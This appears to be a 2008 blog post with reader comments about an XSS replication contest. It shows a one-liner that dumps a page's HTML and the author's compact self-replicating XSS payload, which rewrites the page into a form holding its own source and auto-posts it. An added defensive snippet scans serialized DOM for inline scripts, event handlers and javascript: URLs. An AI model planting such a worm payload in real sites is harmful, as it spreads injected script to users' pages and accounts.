I’ve been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate the source code of the HTML document which I haven’t seen anywhere before. Check it out:-
alert(document.body.parentNode.innerHTML)
This alerts the entire HTML document in Firefox (hopefully IE7 as well), which is pretty cool.
Here is my complete entry which submits the source of itself and posts the content:-
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content> '+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method= 'post')+'.php')</script>
The slice offsets would have to be adjusted depending on the size of the document. The goal of the contest is to produce the smallest possible replication vector (with a couple of other rules).
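The string returned by document.body.parentNode.innerHTML can also be inspected instead of posted. The following is an added example, not part of the original post or the contest entry: a heuristic scan of that serialized markup for script content a page owner did not expect. The function name, the allowlist and the host names are assumptions made for illustration.

```javascript
// Added example. In a browser, call it once DOMContentLoaded has fired:
//   scanSerializedDom(document.documentElement.innerHTML, location.origin)
// innerHTML is a serialization of the live DOM, not the bytes the server sent,
// so nodes injected at runtime show up here too.
// ALLOWED_SCRIPT_HOSTS is a constructed allowlist (assumption).
const ALLOWED_SCRIPT_HOSTS = new Set(['static.example.com']);

function scanSerializedDom(html, pageOrigin, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const findings = [];
  const pageHost = new URL(pageOrigin).host;

  // 1. <script> elements: flag inline bodies and sources on unlisted hosts.
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const m of html.matchAll(scriptRe)) {
    const src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    if (!src) {
      const body = m[2].trim();
      if (body) findings.push({ type: 'inline-script', detail: body.slice(0, 60) });
      continue;
    }
    const url = src[1] ?? src[2] ?? src[3];
    let host = null;
    try { host = new URL(url, pageOrigin).host; } catch { /* unparsable src */ }
    if (host !== pageHost && !allowedHosts.has(host)) {
      findings.push({ type: 'unlisted-script-src', detail: url });
    }
  }

  // 2. Inline event-handler attributes (first one per tag), e.g. onerror=.
  const handlerRe = /<[a-z][^>]*?\s(on[a-z]+)\s*=/gi;
  for (const m of html.matchAll(handlerRe)) {
    findings.push({ type: 'inline-handler', detail: m[1].toLowerCase() });
  }

  // 3. javascript: URLs in href, src or action attributes.
  const jsUrlRe = /\b(href|src|action)\s*=\s*["']?\s*javascript:/gi;
  for (const m of html.matchAll(jsUrlRe)) {
    findings.push({ type: 'javascript-url', detail: m[1].toLowerCase() });
  }
  return findings;
}
```

The regular expressions are a heuristic over the serialized string; they can misfire on markup-like text inside script bodies or attribute values.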




Comments 5
This is interesting indeed! And could be used for many purposes like scanning the page content for malicious stuff getting rendered etc (combine this with onDomReady).
Very nice
Posted 07 Jan 2008 at 1:23 pm
veeery nice man
Posted 07 Jan 2008 at 2:18 pm
Works in IE7 finally managed to test it
Posted 07 Jan 2008 at 4:06 pm
Might be interested in this as well:
Posted 07 Jan 2008 at 6:36 pm
alert(document.documentElement.innerHTML);
@Nils
Cool thanks!
Posted 07 Jan 2008 at 6:42 pm